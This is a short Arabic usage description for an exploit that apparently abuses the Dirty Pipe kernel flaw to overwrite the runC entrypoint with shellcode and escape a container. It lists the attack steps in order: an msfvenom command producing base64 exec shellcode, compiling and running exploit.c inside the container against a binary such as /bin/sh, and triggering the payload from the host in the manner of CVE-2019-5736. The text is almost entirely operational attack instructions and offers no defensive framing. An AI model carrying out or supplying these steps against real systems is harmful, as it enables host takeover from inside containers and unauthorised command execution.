
استغلال بسيط يستخدم dirtypipe لحقن shellcode في runC entrypoint لتنفيذ الهروب من الحاويات.
استغلال بسيط يستخدم Dirty Pipe لحقن شيل كود في نقطة الدخول runC لتنفيذ هروب من الحاوية.
أنتج شيل كود مشفر بـ base64 باستخدام msf:
$ msfvenom -p linux/x64/exec CMD="<command>" -f base64
قم بتجميع وتشغيل داخل الحاوية، اسم الملف المستبدل هو الملف الثنائي الذي سينفذه runC في الحاوية (مثل /bin/sh):
$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>
قم بتفعيل الاستغلال والشيل كود خارج الحاوية مثل CVE-2019-5736.